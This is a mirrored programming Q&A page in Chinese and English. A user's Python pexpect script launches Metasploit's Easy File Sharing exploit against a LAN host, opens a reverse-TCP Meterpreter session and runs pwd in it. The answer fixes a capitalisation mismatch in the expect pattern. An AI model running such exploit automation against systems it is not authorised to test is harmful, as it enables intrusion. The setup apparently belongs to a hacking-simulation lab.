当前位置: 文江博客话题详情

为什么 pexpect 无法读取这一行?

发布于 2025-01-12 01:22:50 字数 2185 浏览 0 评论 0原文

我试图在我的 metasploit 会话上执行 pwd 命令,然后使用 pexpect 检查是否返回了正确的结果。

这是我的函数

def executeEasyFileSharing(target):
    print("Executing: "+"msfconsole -q -x 'use exploit/windows/http/easyfilesharing_post ;set rhosts "+target[1]+";run")
    print("About to metasploit")
    #Create logfile
    fout = open('mylog.txt', 'wb')

    child = pexpect.spawn("msfconsole -q -x "+ str('"use exploit/windows/http/easyfilesharing_post ;set rhosts '+target[1] +';run"'), encoding='utf-8')
    child.logfile = sys.stdout

    print(child.expect_exact("Meterpreter session 1 opened", timeout=300))
    import time
    time.sleep(10)
    child.sendline("pwd")
    child.expect("C:\WINDOWS\System32",timeout=50)
    print("Success")

executeEasyFileSharing(["buffer","192.168.1.86"])

这是运行时看到的控制台输出:

─$ python3 execution.py                                                  130 ⨯
Executing: msfconsole -q -x 'use exploit/windows/http/easyfilesharing_post ;set rhosts 192.168.1.86;run'
About to metasploit
[] No payload configured, defaulting to windows/meterpreter/reverse_tcp
rhosts => 192.168.1.86
[] Started reverse TCP handler on 192.168.1.102:4444 
[] Sending stage (175174 bytes) to 192.168.1.86
[] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.86:59854 ) at 2022-03-05 13:41:46 +0000
0
pwd

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > Traceback (most recent call last):
  File "/home/barry/Desktop/HackSimScripts/HackingSim/execution.py", line 50, in <module>
    executeEasyFileSharing(["buffer","192.168.1.86"])
  File "/home/barry/Desktop/HackSimScripts/HackingSim/execution.py", line 47, in executeEasyFileSharing
    child.expect("C:\WINDOWS\System32",timeout=50)
  File "/usr/lib/python3/dist-packages/pexpect/spawnbase.py", line 343, in expect
    return self.expect_list(compiled_pattern_list,
  File "/usr/lib/python3/dist-packages/pexpect/spawnbase.py", line 372, in expect_list
    return exp.expect_loop(timeout)
  File "/usr/lib/python3/dist-packages/pexpect/expect.py", line 181, in expect_loop
    return self.timeout(e)

预期的输出应该是函数执行并打印成功。 pwd 的结果已清楚显示,那么为什么 pexpect 没有检测到它呢?

原文

I am trying to execute a pwd command on my metasploit session, then using pexpect, check if the correct result was returned.

Here is my function

def executeEasyFileSharing(target):
    print("Executing: "+"msfconsole -q -x 'use exploit/windows/http/easyfilesharing_post ;set rhosts "+target[1]+";run")
    print("About to metasploit")
    #Create logfile
    fout = open('mylog.txt', 'wb')

    child = pexpect.spawn("msfconsole -q -x "+ str('"use exploit/windows/http/easyfilesharing_post ;set rhosts '+target[1] +';run"'), encoding='utf-8')
    child.logfile = sys.stdout

    print(child.expect_exact("Meterpreter session 1 opened", timeout=300))
    import time
    time.sleep(10)
    child.sendline("pwd")
    child.expect("C:\WINDOWS\System32",timeout=50)
    print("Success")

executeEasyFileSharing(["buffer","192.168.1.86"])

Here is the console output seen when run:

─$ python3 execution.py                                                  130 ⨯
Executing: msfconsole -q -x 'use exploit/windows/http/easyfilesharing_post ;set rhosts 192.168.1.86;run'
About to metasploit
[] No payload configured, defaulting to windows/meterpreter/reverse_tcp
rhosts => 192.168.1.86
[] Started reverse TCP handler on 192.168.1.102:4444 
[] Sending stage (175174 bytes) to 192.168.1.86
[] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.86:59854 ) at 2022-03-05 13:41:46 +0000
0
pwd

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > Traceback (most recent call last):
  File "/home/barry/Desktop/HackSimScripts/HackingSim/execution.py", line 50, in <module>
    executeEasyFileSharing(["buffer","192.168.1.86"])
  File "/home/barry/Desktop/HackSimScripts/HackingSim/execution.py", line 47, in executeEasyFileSharing
    child.expect("C:\WINDOWS\System32",timeout=50)
  File "/usr/lib/python3/dist-packages/pexpect/spawnbase.py", line 343, in expect
    return self.expect_list(compiled_pattern_list,
  File "/usr/lib/python3/dist-packages/pexpect/spawnbase.py", line 372, in expect_list
    return exp.expect_loop(timeout)
  File "/usr/lib/python3/dist-packages/pexpect/expect.py", line 181, in expect_loop
    return self.timeout(e)

The expected output should be that the function executes and Success is printed. pwd's result is clearly shown, so why isn't pexpect detecting it?

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(1

提笔落墨 2025-01-19 01:22:50

您期望 System32 具有较高的 S,但它发送的 system32 具有较低的 s - 这是问题。

这应该有效

child.expect("C:\WINDOWS\system32", timeout=50)

最终你可以使用(?i)来检查不区分大小写

child.expect("(?i)C:\WINDOWS\System32", timeout=50)

Stackoverflow上的其他问题:(?i) 在 Python/pexpect 正则表达式中意味着什么?

You expect System32 with upper S but it sends system32 with lower s - and this is problem.

This should work

child.expect("C:\WINDOWS\system32", timeout=50)

Eventually you can use (?i) to check as case insensitive

child.expect("(?i)C:\WINDOWS\System32", timeout=50)

Other question on Stackoverflow: What does (?i) mean in a Python/pexpect regex?

回复 原文
~没有更多了~

关于作者

薄情伤

暂无简介

文章
评论
26 人气
发私信

相关话题

更多

热门标签

操作系统 程序设计 IT运维 Linux系统管理 JavaScript 服务器应用 solaris C/C++ PHP Shell BSD Vue.js aix Oracle Python HTML 系统管理 HTML5 CSS 前端
更多

推荐作者

琉璃梦幻

文章 0 评论 0

qq_4zWU6L

文章 0 评论 0

话少情深

文章 0 评论 0

西西弗的石头怪

文章 0 评论 0

彻夜缠绵

文章 0 评论 0

千寻…

文章 0 评论 0

更多

友情链接

文江博客
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文